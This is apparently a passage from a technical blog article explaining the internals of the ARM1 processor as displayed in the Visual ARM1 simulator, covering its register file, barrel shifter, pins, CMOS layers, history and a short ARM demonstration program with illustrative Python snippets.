The ARM1 chip is built from functional blocks, each with a different purpose. Registers store data, the ALU (arithmetic-logic unit) performs simple arithmetic, instruction decoders determine how to handle each instruction, and so forth. Compared to most processors, the layout of the chip is simple, with each functional block clearly visible. (In comparison, the layout of chips such as the 6502 or Z-80 is highly hand-optimized to avoid any wasted space. In these chips, the functional blocks are squished together, making it harder to pick out the pieces.)

The diagram below shows the most important functional blocks of the ARM chip.[2] The actual processing happens in the bottom half of the chip, which implements the data path. The chip operates on 32 bits at a time so it is structured as 32 horizontal layers: bit 31 at the top, down to bit 0 at the bottom. Several data buses run horizontally to connect different sections of the chip. The large register file, with 25 registers, stands out in the image. The Program Counter (register 15) is on the left of the register file and register 0 is on the right.[3]

The main components of the ARM1 chip. Most of the pins are used for address and data lines; unlabeled pins are various control signals.

Computation takes place in the ALU (arithmetic-logic unit), which is to the right of the registers. The ALU performs 16 different operations (add, add with carry, subtract, logical AND, logical OR, etc.). It takes two 32-bit inputs and produces a 32-bit output. The ALU is described in detail here.[4] To the right of the ALU is the 32-bit barrel shifter. This large component performs a binary shift or rotate operation on its input, and is described in more detail below. At the left is the address circuitry, which provides an address to memory through the address pins. At the right, the data circuitry reads and writes data values to memory.

Above the datapath circuitry is the control circuitry. The control lines run vertically from the control section to the data path circuits below. These signals select registers, tell the ALU what operation to perform, and so forth. The instruction decode circuitry processes each instruction and generates the necessary control signals. The register decode block processes the register select bits in an instruction and generates the control signals to select the desired registers.[5]

The pins

The squares around the outside of the image above are the pads that connect the processor to the outside world. The photo below shows the 84-pin package for the ARM1 processor chip. The gold-plated pins are wired to the pads on the silicon chip inside the package.

The ARM1 processor chip installed in the Acorn ARM Evaluation System. Original photo by Flibble, https://commons.wikimedia.org/wiki/File:Acorn-ARM-Evaluation-System.jpg, CC BY-SA 3.0.

Most of the pads are used for the address and data lines to memory. The chip has 26 address lines, allowing it to access 64MB of memory, and has 32 data lines, allowing it to read or write 32 bits at a time. The address lines are in the lower left and the data lines are in the lower right. As the simulator runs, you can see the address pins step through memory and the data pins read data from memory. The right hand side of the simulator shows the address and data values in hex, e.g. «A:00000020 D:e1a00271». If you know hex, you can easily match these values to the pin states.

Each corner of the chip has a power pin (+) and a ground pin (-), providing 5 volts to run the chip. Various control signals are at the top of the chip. In the simulator, it is easy to spot the two clock signals that step the chip through its operations (below). The phase 1 and phase 2 clocks alternate, providing a tick-tock rhythm to the chip. In the simulator, the clock runs at a couple of cycles per second, while the real chip has an 8MHz clock, more than a million times faster. Finally, note below the manufacturer’s name «ACORN» on the chip in place of pin 82.

The two clock signals for the ARM1 processor chip.

History of the ARM chip

The ARM1 was designed in 1985 by engineers Sophie Wilson (formerly Roger Wilson) and Steve Furber of Acorn Computers. The chip was originally named the Acorn RISC Machine and intended as a coprocessor for the BBC Micro home/educational computer to improve its performance. Only a few hundred ARM1 processors were fabricated, so you might expect ARM to be a forgotten microprocessor, a historical footnote of the 1980s. However, the original ARM1 chip led to the amazingly successful ARM architecture with more than 50 billion ARM chips produced. What happened?

In the early 1980s, academic research suggested that instead of making processor instruction sets more complex, designers would get better performance from a processor that was simple but fast: the Reduced Instruction Set Computer or RISC.[6] The Berkeley and Stanford research papers on RISC inspired the ARM designers to choose a RISC design. In addition, given the small size of the design team at Acorn, a simple RISC chip was a practical choice.[7]

The simplicity of a RISC design is clear when comparing the ARM1 and Intel’s 80386, which came out the same year: the ARM1 had about 25,000 transistors versus 275,000 in the 386.[8] The photos below show the two chips at the same scale; the ARM1 is 50mm² compared to 104mm² for the 386. (Twenty years later, an ARM7TDMI core was 0.1mm²; magnified at the same scale it would be the size of this square, vividly illustrating Moore’s law.)

Die photos of the ARM1 processor and the Intel 386 processor to the same scale. The ARM1 is much smaller and contained 25,000 transistors compared to 275,000 in the 386. The 386 was higher density, with a 1.5 micron process compared to 3 micron for the ARM1. ARM1 photo courtesy of Computer History Museum. Intel A80386DX-20 by Pdesousa359, CC BY-SA 3.0.

Because of the ARM1’s small transistor count, the chip used very little power: about 1/10 Watt, compared to nearly 2 Watts for the 386. The combination of high performance and low power consumption made later versions of the ARM chip very popular for embedded systems. Apple chose the ARM processor for its ill-fated Newton handheld system, and in 1990 Acorn Computers, Apple, and chip manufacturer VLSI Technology formed the company Advanced RISC Machines to continue ARM development.[9]

In the years since then, ARM has become the world’s most-used instruction set, with more than 50 billion ARM processors manufactured. The majority of mobile devices use an ARM processor; for instance, the Apple A8 processor inside the iPhone 6 uses the 64-bit ARMv8-A architecture. Despite its humble beginnings, the ARM1 made IEEE Spectrum’s list of 25 microchips that shook the world and PC World’s 11 most influential microprocessors of all time.

Looking at the low-level construction of the ARM1 chip

Getting back to the chip itself, the ARM1 chip is constructed from five layers. If you zoom in on the chip in the simulator, you can see the components of the chip, built from these layers. As seen below, the simulator uses a different color for each layer, and highlights circuits that are turned on. The bottom layer is the silicon that makes up the transistors of the chip. During manufacturing, regions of the silicon are modified (doped) by applying different impurities. Silicon can be doped positive to form a PMOS transistor (blue) or doped negative for an NMOS transistor (red). Undoped silicon is basically an insulator (black).

The ARM1 simulator uses different colors to represent the different layers of the chip.

Polysilicon wires (green) are deposited on top of the silicon. When polysilicon crosses doped silicon, it forms the gate of a transistor (yellow). Finally, two layers of metal (gray) are on top of the polysilicon and provide wiring.[10] Black squares are contacts that form connections between the different layers.

For our purposes, a MOS transistor can be thought of as a switch, controlled by the gate. When it is on (closed), the source and drain silicon regions are connected. When it is off (open), the source and drain are disconnected. The diagram below shows the three-dimensional structure of a MOS transistor.

Structure of a MOS transistor.

Like most modern processors, the ARM1 was built using CMOS technology, which uses two types of transistors: NMOS and PMOS. NMOS transistors turn on when the gate is high, and pull their output towards ground. PMOS transistors turn on when the gate is low, and pull their output towards +5 volts.

Understanding the register file

The register file is a key component of the ARM1, storing information inside the chip. (As a RISC chip, the ARM1 makes heavy use of its registers.) The register file consists of 25 registers, each holding 32 bits. This section describes step-by-step how the register file is built out of individual transistors.

The diagram below shows two transistors forming an inverter. If the input is high (as below), the NMOS transistor (red) turns on, connecting ground to the output so the output is low. If the input is low, the PMOS transistor (blue) turns on, connecting power to the output so the output is high. Thus, the output is the opposite of the input, making an inverter.

An inverter in the ARM1 chip, as displayed by the simulator.

Combining two inverters into a loop forms a simple storage circuit. If the first inverter outputs 1, the second inverter outputs 0, causing the first inverter to output 1, and the circuit is stable. Likewise, if the first inverter outputs 0, the second outputs 1, and the circuit is again stable. Thus, the circuit will remain in either state indefinitely, «remembering» one bit until forced into a different state.
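
The same logic can be captured in a few lines of Python (just an illustration of the feedback loop, not a model of the actual circuitry):

def inverter(x):
    # The output is the opposite of the input.
    return 0 if x else 1

def around_the_loop(bit):
    # Two inverters in a loop: passing the stored bit through both
    # inverters reproduces it, so the circuit holds its value.
    return inverter(inverter(bit))

assert around_the_loop(0) == 0
assert around_the_loop(1) == 1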

Two inverters in the ARM1 chip form one bit of register storage.

To make this circuit into a useful register cell, read and write bus lines are added, along with select lines to connect the cell to the bus lines. When the write select line is activated, a pass transistor connects the write bus to the inverter, allowing a new value to overwrite the current bit. Likewise, pass transistors connect the bit to a read bus when activated by the corresponding select line, allowing the stored value to be read out.

Schematic of one bit in the ARM1 processor’s register file.

To create the register file, the register cell above is repeated 32 times vertically for each bit, and 25 times horizontally to form each register. Each bit has three horizontal bus lines — the write bus and the two read buses — so there are 32 triples of bus lines. Each register has three vertical control lines — the write select line and two read select lines — so there are 25 triples of control lines. By activating the desired control lines, two registers can be read and one register can be written at a time.[11] When the simulator is running, you can see the vertical control lines activated to select registers, and you can see the data bits flowing on the horizontal bus lines.
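
As a software analogy of that arrangement, here is a minimal Python sketch of a triple-ported register file; the class name and interface are illustrative, not taken from the chip:

class RegisterFile:
    # 25 registers of 32 bits each, with two read buses and one write bus,
    # so two reads and one write can happen in the same cycle.
    def __init__(self, num_registers=25, width=32):
        self.mask = (1 << width) - 1
        self.regs = [0] * num_registers

    def cycle(self, read_a, read_b, write_sel=None, write_value=0):
        # Activating two read select lines drives the two read buses.
        bus_a = self.regs[read_a]
        bus_b = self.regs[read_b]
        # Activating the write select line lets the write bus overwrite one register.
        if write_sel is not None:
            self.regs[write_sel] = write_value & self.mask
        return bus_a, bus_b

rf = RegisterFile()
rf.cycle(read_a=1, read_b=2, write_sel=0, write_value=0xffffffff)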

By looking at a memory cell in the simulator, you can see which inverter is on and determine if the bit is a 0 or a 1. The diagram below shows a few register bits. If the upper inverter input is active, the bit is 0; if the lower inverter input is active, the bit is 1. (Look at the green lines above or below the bit values.) Thus, you can read register values right out of the simulator if you look closely.

By looking at the ARM1 register file, you can determine the value of each bit. For a 0 bit, the input to the top inverter is active (green/yellow); for a 1 bit, the input to the bottom inverter is active.

The barrel shifter

The barrel shifter, which performs binary shifts, is another interesting component of the ARM1. Most instructions use the barrel shifter, allowing a binary argument to be shifted left, shifted right, or rotated by any amount (0 to 31 bits). While running the simulator, you can see diagonal lines jumping back and forth in the barrel shifter.

The diagram below shows the structure of the barrel shifter. Bits flow into the shifter vertically with bit 0 on the left and bit 31 on the right. Output bits leave the shifter horizontally with bit 0 on the bottom and bit 31 on top. The diagonal lines visible in the barrel shifter show where the vertical lines are connected to the horizontal lines, generating a shifted output. Different positions of the diagonals result in different shifts. The upper diagonal line shifts bits to the left, and the lower diagonal line shifts bits to the right. For a rotation, both diagonals are active; it may not be immediately obvious, but in a rotation part of the word is shifted left and part is shifted right.
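
In software terms, that is exactly how a rotate decomposes into two shifts; a quick Python sketch:

def ror32(value, amount):
    # 32-bit rotate right: the word shifted right by `amount` supplies the
    # low part, and the bits that fall off are shifted left into the top.
    # The two shifts correspond to the two active diagonals.
    amount &= 31
    return ((value >> amount) | (value << (32 - amount))) & 0xffffffff

For example, ror32(0x0000000f, 4) yields 0xf0000000.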

Structure of the barrel shifter in the ARM1 chip.

Zooming in on the barrel shifter shows exactly how it works. It contains a 32 by 32 crossbar grid of transistors, each connecting one vertical line to one horizontal line. The transistor gates are connected by diagonal control lines; transistors along the active diagonal connect the appropriate vertical and horizontal lines. Thus, by activating the appropriate diagonals, the output lines are connected to the input lines, shifted by the desired amounts. Since the chip’s input lines all run horizontally, there are 32 connections between input lines and the corresponding vertical bit lines.

Details of the barrel shifter in the ARM1 chip. Transistors along a specific diagonal are activated to connect the vertical bit lines and output lines. Each input line is connected to a vertical bit line through the indicated connections.

The demonstration program

When you run the simulator, it executes a short hardcoded program that performs shifts of increasing amounts. You don’t need to understand the code, but if you’re curious it is:

0000  E1A0100F mov     r1, pc        @ Some setup
0004  E3A0200C mov     r2, #12
0008  E1B0F002 movs    pc, r2
000C  E1A00000 nop
0010  E1A00000 nop
0014  E3A02001 mov     r2, #1        @ Load register r2 with 1
0018  E3A0100F mov     r1, #15       @ Load r1 with value to shift
001C  E59F300C ldr     r3, pointer
    loop:
0020  E1A00271 ror     r0, r1, r2    @ Rotate r1 by r2 bits, store in r0
0024  E2822001 add     r2, r2, #1    @ Add 1 to r2
0028  E4830004 str     r0, [r3], #4  @ Write result to memory
002C  EAFFFFFB b       loop          @ Branch to loop

Inside the loop, register r1 (0x000f) is rotated to the right by r2 bit positions and the result is stored in register r0. Then r2 is incremented and the shift result written to memory. As the simulator runs, watch as r2 is incremented and as r0 goes through the various values of 4 bits rotated. The A and D values show the address and data pins as instructions are read from memory.
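
For reference, here is a quick Python sketch of the values r0 takes on during the first few iterations of the loop (0x000f rotated right by increasing amounts):

r1 = 0x000f
for r2 in range(1, 9):
    # 32-bit rotate right of r1 by r2 bits, as the ror instruction does.
    r0 = ((r1 >> r2) | (r1 << (32 - r2))) & 0xffffffff
    print('r2={:2d}  r0={:08x}'.format(r2, r0))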

The changing shift values are clearly visible in the barrel shifter, as the diagonal line shifts position. If you zoom in on the register file, you can read out the values of the registers, as described earlier.

Conclusion

The ARM1 processor led to the amazingly successful ARM processor architecture that powers your smart phone. The simple RISC architecture of the ARM1 makes the circuitry of the processor easy to understand, at least compared to a chip such as the 386.[12] The ARM1 simulator provides a fascinating look at what happens inside a processor, and hopefully this article has helped explain what you see in the simulator.

P.S. If you want to read more about ARM1 internals, see Dave Mugridge’s series of posts:
Inside the armv1 Register Bank
Inside the armv1 Register Bank — register selection
Inside the armv1 Read Bus
Inside the ALU of the armv1 — the first ARM microprocessor

Notes and references

[1] I should make it clear that I am not part of the Visual 6502 team that built the ARM1 simulator. More information on the simulator is in the Visual 6502 team’s blog post The Visual ARM1.

[2] The block diagram below shows the components of the chip in more detail. See the ARM Evaluation System manual for an explanation of each part.

Floorplan of the ARM1 chip, from ARM Evaluation System manual. (Bus labels are corrected from original.)

[3] You may have noticed that the ARM architecture describes 16 registers, but the chip has 25 physical registers. There are 9 «extra» registers because there are extra copies of some registers for use while handling interrupts.

Another interesting thing about the register file is that the PC register is missing a few bits. Since the ARM1 uses 26-bit addresses, the top 6 bits are not used. Because all instructions are aligned on a 32-bit boundary, the bottom two address bits in the PC are always zero. These 8 bits are not only unused, they are omitted from the chip entirely.

[4] The ALU doesn’t support multiplication (added in ARM 2) or division (added in ARMv7).

[5] A bit more detail on the decode circuitry. Instruction decoding is done through three separate PLAs. The ALU decode PLA generates control signals for the ALU based on the four operation bits in the instruction. The shift decode PLA generates control signals for the barrel shifter. The instruction decode PLA performs the overall decoding of the instruction. The register decode block consists of three layers. Each layer takes a 4-bit register id and activates the corresponding register. There are three layers because ARM operations use two registers for inputs and a third register for output.

[6] In a RISC computer, the instruction set is restricted to the most-used instructions, which are optimized for high performance and can typically execute in a single clock cycle. Instructions are a fixed size, simplifying the instruction decoding logic. A RISC processor requires much less circuitry for control and instruction decoding, leaving more space on the chip for registers. Most instructions operate on registers, and only load and store instructions access memory. For more information on RISC vs CISC, see RISC architecture.

[7] For details on the history of the ARM1, see Conversation with Steve Furber: The designer of the ARM chip shares lessons on energy-efficient computing.

[8] The 386 and the ARM1 instruction sets are different in many interesting ways. The 386 has instructions from 1 byte to 15 bytes, while all ARM1 instructions are 32 bits long. The 386 has 15 registers, all with special purposes, while the ARM1 has 25 registers, mostly general-purpose. 386 instructions can usually operate on memory, while ARM1 instructions operate on registers except for load and store. The 386 has about 140 different instructions, compared to a couple dozen in the ARM1 (depending how you count). Take a look at the 386 opcode map to see how complex decoding a 386 instruction is. ARM1 instructions fall into 5 categories and can be simply decoded. (I’m not criticizing the 386’s architecture, just pointing out the major architectural differences.)

See the Intel 80386 Programmer’s Reference Manual and 80386 Hardware Reference Manual for more details on the 386 architecture.

[9] Interestingly the ARM company doesn’t manufacture chips. Instead, the ARM intellectual property is licensed to hundreds of different companies that build chips that use the ARM architecture. See The ARM Diaries: How ARM’s business model works for information on how ARM makes money from licensing the chip to other companies.

[10] The first metal layer in the chip runs largely top-to-bottom, while the second metal layer runs predominantly horizontally. Having two layers of metal makes the layout much simpler than single-layer processors such as the 6502 or Z-80.

[11] In the register file, alternating bits are mirrored to simplify the layout. This allows neighboring bits to share power and ground lines. The ARM1’s register file is triple-ported, so two registers can be read and one register written at the same time. This is in contrast to chips such as the 6502 or Z-80, which can only access registers one at a time.

[12] For more information on the ARM1 internals, see the book VLSI RISC Architecture and Organization by ARM chip designer Steven Furber, which has a hundred pages of detail on the chip’s internals. An interesting slide deck is A Brief History of ARM by Lee Smith, ARM Fellow.